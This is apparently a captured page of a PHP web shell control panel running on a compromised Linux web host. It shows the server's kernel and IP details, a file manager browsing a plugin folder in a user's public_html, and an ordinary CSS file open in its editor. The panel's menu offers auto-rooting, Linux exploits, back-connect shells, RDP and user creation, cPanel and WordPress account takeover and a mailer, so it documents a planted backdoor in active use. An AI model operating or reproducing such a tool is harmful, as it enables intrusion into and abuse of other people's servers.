Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 108.162.216.82
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
filter /
filtercodes /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
thirdparty
[ DIR ]
drwxr-xr-x
.gitignore
7.32
KB
-rw-r--r--
CHANGELOG.md
26.14
KB
-rw-r--r--
CODE_OF_CONDUCT.md
5.14
KB
-rw-r--r--
CONTRIBUTING.md
2.13
KB
-rw-r--r--
LICENSE.txt
31.71
KB
-rw-r--r--
README.md
120.03
KB
-rw-r--r--
SECURITY.md
137
B
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
composer.json
684
B
-rw-r--r--
filter.php
1.11
KB
-rw-r--r--
lib.php
2.13
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
phpcs.xml.dist
239
B
-rw-r--r--
settings.php
1.24
KB
-rw-r--r--
styles.css
1.89
KB
-rw-r--r--
thirdpartylibs.xml
246
B
-rw-r--r--
version.php
1.26
KB
-rw-r--r--
wishlist.php
2.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : styles.css
@property --percent { syntax: '<number>'; inherits: true; /* stylelint-disable-next-line -- not yet supported in FireFox. */ initial-value: 0; } .fc-chart-pie .chart-area .chart-image { width: auto; } .fc-progress-pie { --color: purple; --percent: 0; --size: 150px; --border: 20px; --bgcolor: #f0f0f0; width: var(--size); aspect-ratio: 1; position: relative; display: inline-grid; margin: 5px; place-content: center; font-size: 1.5rem; font-weight: bold; } .fc-progress-pie:before, .fc-progress-pie:after { content: ""; position: absolute; border-radius: 50%; } .fc-progress-pie:before { inset: 0; background: radial-gradient(farthest-side, var(--color) 98%, #0000) top/var(--border) var(--border) no-repeat, conic-gradient(var(--color) calc(var(--percent) * 1%), #0000 0); -webkit-mask: radial-gradient(farthest-side, #0000 calc(99% - var(--border)), #000 calc(100% - var(--border))); mask: radial-gradient(farthest-side, #0000 calc(99% - var(--border)), #000 calc(100% - var(--border))); background-color: var(--bgcolor); background-size: 0 0, auto; } .fc-progress-pie:after { inset: calc(50% - var(--border) / 2); background: var(--color); transform: rotate(calc(var(--percent) * 3.6deg)) translateY(calc(50% - var(--size) / 2)); content: none; } .fc-progress-pie.animate { animation: fc-progress-pie-percent 1s .5s both; } @keyframes fc-progress-pie-percent { from { --percent: 0; } } kbd { padding: 0.1rem 0.4rem; background-color: #eee; border: 1px solid #b4b4b4; border-radius: 0.25rem; font-family: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.2), 0 2px 0 0 rgba(255, 255, 255, 0.7) inset; color: #333; white-space: nowrap; display: inline-block; }
Close